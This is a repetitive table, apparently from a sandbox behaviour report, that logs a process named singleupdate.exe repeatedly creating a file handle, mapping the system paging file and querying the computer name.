| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
